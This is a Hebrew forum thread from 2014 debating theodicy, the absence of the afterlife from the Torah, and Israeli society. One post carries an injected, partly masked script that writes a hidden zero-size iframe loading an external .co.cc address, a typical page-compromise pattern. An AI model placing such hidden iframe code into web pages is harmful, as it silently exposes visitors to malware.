| נשלח ב-10/7/2014 19:53 |
|
| |
| מיימוני כתב: |  |
...
על זה אפשר לענות שה' כיפר בדמם של חפים מפשע על פשעי הדור. הנה.
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
|
|
מעניין מה תהיה תגובתך, אם הבן שלך יחזור הביתה ויספר שהרבה הוריד לו סתירת לחי והוא לא עשה כלום, תגיע נזעם לחיידר והרבה יגיד לך היו הפרעות בכיתה הייתי חייב לתפוס קרבן שכולם יראו וילמדו.
ולשאר דבריך אתה צודק. אני בטוחה שאני חייבת להתמודד. בידיעה שלא-ל יש תשובה טובה, ותוכנית מעולה לנתינים שלו.
ואגב, אולי אני אזכה להרגיז אתכם, עם כל הצער במות שלושת החטופים. זה לא כל כך מקומם מה שקרה, (אין לי כוח להסביר למה אני חושבת כך), מקומם למה אנשים מסוגלים להפך לטרוריסטים ולמחבלים במקום לדאוג לפרנסתם ולרווחת נשותיהם וילדיהם ושאר סביבתם. [וברוח הומוריסטית] למה אנשים מגיעים למצב שהם שורצים שעות על גבי שעות מזפזפים בין אתרים, למשל בפורום המרכזי של חדרי חרדים משמיצים פוגעים מקללים ומנייעסים, ללא כל מטרה בחיים (בעצם בשם הצדק והיושר), שילכו לעבוד (או לכולל).
|
|
|
|
| נשלח ב-10/7/2014 19:55 |
|
| |
| פיילין_שרה כתב: |  |
יש שיצביעו על כך שהעיקר הוא העולם הבא. אז מה זה משנה, באמת, כמה זמן חיים כאן. הנקודה היא להספיק. לעשות את הראוי.
אולי אתה צודק שהעיקר הוא העולם הבא, אבל לפי מה שלמדתי, רוב האנושות תלך לגהינום (אחרי שסבלו כאן 70-90 שנה), חלק נשמתם תכרת, חלק יתגלגלו כאן חזרה בתוך חתול או אבן או אולי כמו יהודי מנודה מפונוביז, והמעט שנשאר אחרי שיגמרו לזקק את עצמם ויעברו לגן עדן, יקנאו בצדיקים וירגישו זבל שלא אספו כאן יותר יהלומים בגנזי המלך, בקיצור רק החפץ חיים שבכל דור יזכה ליהנות ולהשלים את מסעו אל היעד הנכסף, וכל שאר המיליונים שנולדו בכל שנה ושנה ילכו לעזאזל. אני מרגישה שחסר כאן משהו מאוד מהותי בהסבר זה, גם אם תאמר שכל האנושות תזדכך פעם אחר פעם אחר פעם עד להגיעם לשלמות הנכספת. |
|
אינני סבור שהעולם הבא עיקר ולו רק בשל העובדה שהוא לא מוזכר אפילו פעם אחת בתורה ושאם אכן היה העולם הבא עיקר, לא היה טעם לבחור בעם מסוים בעולם הזה שישמש אור לעמים אחרים. ראי גם בשיעור זה, בעיקר בדעת הרב שרלו עצמו(ע״פ הכוזרי): http://www.ynet.co.il/articles/0,7340,L-4515713,00.html
|
|
|
|
| נשלח ב-11/7/2014 00:31 |
|
| |
אתה צודק, אי אפשר למרוח למה עולם הבא לא מוזכר בתורה.
ובעצם אם אני לא טועה גם לא תחיית המתים, שכר ועונש בתורה זה רק בעולם הזה, ונתתי מטר ארצכם בעתו וכיוצא.
זה טעון התייחסות בכובד ראש.
|
|
|
|
| נשלח ב-11/7/2014 00:51 |
|
| |
| פיילין_שרה כתב: |  |
לדוגמא, הנחת הנחה מאוד בעייתית, שהעולם במתכונתו הנוכחית הוא "שיא השלמות". הבעיה שבהנחה הזו היא שכל חמשת החושים שלנו מעידים שזה לא נכון. זו הנחה שמגיעה מטיעון פילוסופי כלשהו, שגם אם מבחינה פילוסופית נניח שהוא תקף, המציאות דוחה אותו בשתי ידיים. העולם לא מושלם. נקודה. יש בו המון חסרונות והמון פגמים. יש גם הרבה רוע בעולם. זו המציאות ומי שמתווכח איתה הוא מנותק מהמציאות.
זה בדיוק מה שהתכוונתי לומר, (אולי לא הסברתי את עצמי אולי לא הובנתי).
העולם רע ולא מושלם, עובדה יש את החמאס (בכל דור ודור) ויש שרוצחים בגלל ריב על חנייה. אבל אין ספק שאם הא-ל ברא את העולם במתכונתה הנוכחית. זה אומר שזה המתכון המדויק והכי מופתי ומושלם פילוסופית ושכלית לברוא עולם לבני אנוש. אנשים חכמים עושים טעויות וכשלים, ולפעמים זה בגלל שהם לא מספיק חכמים (ולפעמים בגלל אגו), וכשמגיע אדם חכם יותר הוא מתקן ומשנה, ואז בא אדם עוד יותר חכם ומשנה שוב, אבל אצל הא-ל שחכמתו מושלמת (וגם יכולותיו) אין ספק שהוא הביא את הגרסה הכי הכי לעולם.
והעולם הזה, שאין ספק שהוא המודל הכי מוצלח עבור בני האדם, הוא עולם לא מושלם! עולם רע! עד כדי כך ששה מיליון ועוד כמה מיליארדים שואלים למה?? ואגב, אדון ירוחםשמ יש לי בשבילך חדשות לא רק יוצאי מצרים שאלו למה, גם הרמח"ל העז לשאול למה? והיות ואני לא מרגישה שתשובתו מספקת אותי, אז גם אני שואלת למה? אני מאמינה שכשכאן בפורום שואלים למה לא שואלים את זה בטון של טומי לפיד אלא בטון של הרמח"ל, למה עולם של כאב, רשע, אסונות, וכו' זה עולם מושלם יצירת מופת של הא-ל.
נ.ב. אני יכולה להבין שאנחנו לא נוכל להבין |
|
שרה, את המשך דבריי לא ציטטת. שם טענתי כי דוקא העולם הלא מושלם בעליל שאלוהים שם אותנו בו, הוא, באי-מושלמותו, יוצר עבורנו את התפקיד (לתקן) ואת החובה (המוסרית) שמעניקה לנו את הכבוד העצמי. בעולם מושלם יכולנו רק להתענג, אבל עונג ללא חובה מביא לדיכאון [כפי שלהיפך, חובה ללא עונג מביאה לחרדה], ולכן עולם שהוא בד"כ טוב, ויש בו גם פגמים שעלינו לתקן, הוא הטוב עבורנו. יש להוסיף שהטענה הזו בפירוש לא עונה על כל הרוע שיש בעולם, אבל מציבה את השאלה בפרופורציה אחרת. עוד יש להדגיש, שאין בה כדי לזלזל ולו במעט בסבל אנושי כלשהו. יש בה כדי להעניק משמעות מקדמת לכל סבל. במונחים של הרב סולובייצ'יק הטענה הזו אומרת שהייעוד הוא המטרה (והסיבה) של הגורל. עוד יש להעיר, שגם אם נקבל את טענתי, עדיין ניתן לשאול מדוע אלוהים ברא בני אדם שדרושה להם חובה לצד העונג, ולא ברא בני אדם שדי להם בעונג בלבד. לי אישית השאלה הזו לא מפריעה, אבל אני מכיר כאלו שזה מטריד אותם.
 |
|
|
|
|
| נשלח ב-11/7/2014 09:07 |
|
| |
פיילין כתבה- "והעולם הזה, שאין ספק שהוא המודל הכי מוצלח עבור בני האדם" חזק כתב - "אבל עונג ללא חובה מביא לדיכאון" שמעתי מאחורי הפרגוד כי ה' הוציא מכרזים אצל המלאכים א. למודל מוצלח יותר של העולם ב. לאדם שירגיש עונג ללא חובה ולא יבוא לידי דיכאון. עובדים על זה. דרך החשיבה שלכם מבוססת על כך שה' אינו כל יכול אלא הוא כבול למגבלות. ולאלו שתמהו מדוע עוה"ב אינו מוזכר בתורה - ראו בדברי הר"מ (באגרת תחימן כמדומני) ומן הסתם תשובתו שם טינה לגמרי כפשוטה
|
|
|
|
| נשלח ב-11/7/2014 10:30 |
|
| |
| תלמידטועה כתב: |  | | ולאלו שתמהו מדוע עוה"ב אינו מוזכר בתורה - ראו בדברי הר"מ (באגרת תחימן כמדומני) ומן הסתם תשובתו שם טינה לגמרי כפשוטה |
|
אני לא יודעת מי זה הרמ, אבל לשאלה כזו מהותית אי אפשר להביא תשובה של איזה פלפול של דיוקים או דרוש חסידי, כי גם אני לעומת זאת יכולה לעשות לך פלפול מה הכוונה תחיית המתים, הכוונה אולי שיבואו ארכאולוגים מאוד מתקדמים עם ציוד משוכלל ויוכלו לשחזר לך מה הבן אדם עשה כאן בעולם הזה במשך מאה שנה שהוא חי לפני שלושת אלפים שנה.
צריך תשובה באמת מסבירה, למה עיקרי הדת אינם מופיעים בשום צורה בתורה.
תוקן על ידי פיילין_שרה ב- 11/07/2014 10:31:32
תוקן על ידי פיילין_שרה ב- 11/07/2014 10:32:50
|
|
|
|
| נשלח ב-11/7/2014 11:11 |
|
| |
הפלפול החסידי הזה מופיע באידרת תימן לרמב"ם (הר"מ)
|
|
|
|
| נשלח ב-11/7/2014 11:35 |
|
| |
אינני יודע מה אומר הרמב״ם באגרת תימן, אך במשנה תורה, בו הוא מעלה על נס דווקא את העולם הבא ואף את פרשיות שכר ועונש הוא מפרש בבחינת הבא ליטהר מסייעין בידו, דהיינו שהקב״ה נותן שלום בארץ כדי שנוכל לעסוק בתורה ובחכמה ולא כשכר וכן לגבי העונשים,הוא נדחק קצת בעניין העולם הבא בתורה ואומר שהוא מוזכר ב למען ייטב לך והארכת ימים -עולם שכולו טוב וארוך. בדברים אלה יש קושי למה, אם העולם הבא עיקר, הוא מוזכר רק פעם אחת וגם זה בדרך רמז ודרש. ע״כ עדיפה שיטתו של הריה״ל בעניין זה, שתוכל לראותה שקישור שהבאתי למעלה.
|
|
|
|
| נשלח ב-11/7/2014 14:02 |
|
| |
פיילין שרה כותבת
הכל מה שנכתב כאן הן אכן פלפולים חסידים והברגות ליטאיות, למרות שכת אותן הרמב"ם- הוא לא היה חף מהברגות- והצטיין בהן מאד.
|
|
|
|
| נשלח ב-12/7/2014 22:19 |
|
| |
| מם80 כתב: |  | | לדאבוננו מדינת ישראל דומה יותר למדינות העולם השלישי מאשר למדינה מתוקנת. |
|
אינני מבין את הנטייה להשוות את ישראל כל העת למדינות "מתוקנות", כגון צרפת, הרי כל המדינות הללו המכונות מדינות המשולש (ארה"ב יפן והאיחוד האירופי) אינם מונים אלא 15% בלבד מכלל האוכלוסיה. האם זה הגיוני להשוות מדינה כ"כ קטנה שלא חברה בשום איחוד כלכלי/מדיני, שהוקמה לפני עשרות שנים בלבד, ונמצאת באיום קיומו מאז הקמתה, ובנוסף חלק מהאוכלוסיות בה (כ20% לפחות) אינם משתתפים בנטל, דווקא ל-15% אחוז הללו? ביחס ל-85% האחרים (מזרח רחוק,מזרח תיכון,דרום אמריקה,מזרח אירופה,אפריקה וכו') היא נראית די טוב! במיוחד אינני מבין את הנטייה של החרדים לעשות זאת, הלא לו הדבר היה תלוי בהם המדינה הייתה מדינת עולם שלישי על כל המשתע מכך. מה ש-מ80 קורא "הברדק המזרח אירופי" מאפיין יותר מכל את החרדים, בנוסף תן לי לנחש שחוסר שביעות רצונך, מצב השכונות בירושלים נובע מהיכרותך עם השכונות החרדיות, שמתאפיינות בהזנחה, אם משום חוסר התרבות המאפיין אותם, ואם מחמת הארנונה הנמוכה שהם משלמים.
|
|
|
|
| נשלח ב-12/7/2014 23:25 |
|
| |
| ירוחםשמ כתב: |  | פיילין שרה כותבת
הכל מה שנכתב כאן הן אכן פלפולים חסידים והברגות ליטאיות, למרות שכת אותן הרמב"ם- הוא לא היה חף מהברגות- והצטיין בהן מאד. |
|
לא צריך תשובה, כי קיומו של העולם הבא אינו מ"עיקרי הדת". יכול להיות שזה פרט חשוב במכלול האמונות של היהדות, ויכול להיות שהוא פחות חשוב, אבל אם התורה לא מזכירה את זה, זה לא יכול להיות מעיקרי הדת.
|
|
|
|
| נשלח ב-13/7/2014 01:01 |
|
| |
אני מגיבה לתגובה שקבלתי בפרטי.
אני בהחלט מאמינה בתחיית המתים ובשכר ועונש ובעולם הבא.
אך הנקודה שהעלו כאן, שהתחברתי אליו. שהמסר הברור שעולה ומשתקף מהתורה עצמה, שהעולם הזה הוא העיקר שסביבו המצוות מה שמותר ומה שאסור ומה שמרוויחים מזה, כל השכר והעונש. אפילו הקרבנות זה להשפעות כאן
אין שום מצווה או עבירה שהתורה מיחסת את זה לעולם הבא לתחיית המתים לגן עדן. אפילו לא כרת. זה אומר שלעולם הזה יש חלק מאוד חשוב וקריטי בדת שלנו.
|
|
|
|
| נשלח ב-17/7/2014 11:18 |
|
| |
גדול עלי,
מוטב אחזור לבישולים, קניות, ולילדים. וגם טיולים ועבודה. נשאיר אותכם להתקטש בשאלות העומדות מעל רומו של עולם.
|
|
|
|
| נשלח ב-17/7/2014 11:28 |
|
| |
שרה, להתכתש (ולא להתקטש, שזה כנראה מלשון עודד קטש. אנחנו מכבי כאן).
|
|
|
|
| נשלח ב-18/7/2014 00:58 |
|
| |
אני מאוד משתדלת לא לכתוב טעויות כתיב דקדוק זכר או נקבה, אני עוברת כמה וכמה פעמים על הטקסט, ואפילו נעזרת בתרגומון.
אבל אין מאה אחוז, אני גאה מאוד שהעברית שלי הרבה יותר טובה מעולים אחרים.
תודה על הערתך, אני מקבלת באהבה ולא מפסיקה לתקן את עצמי בכל תחום.
|
|
|
|
|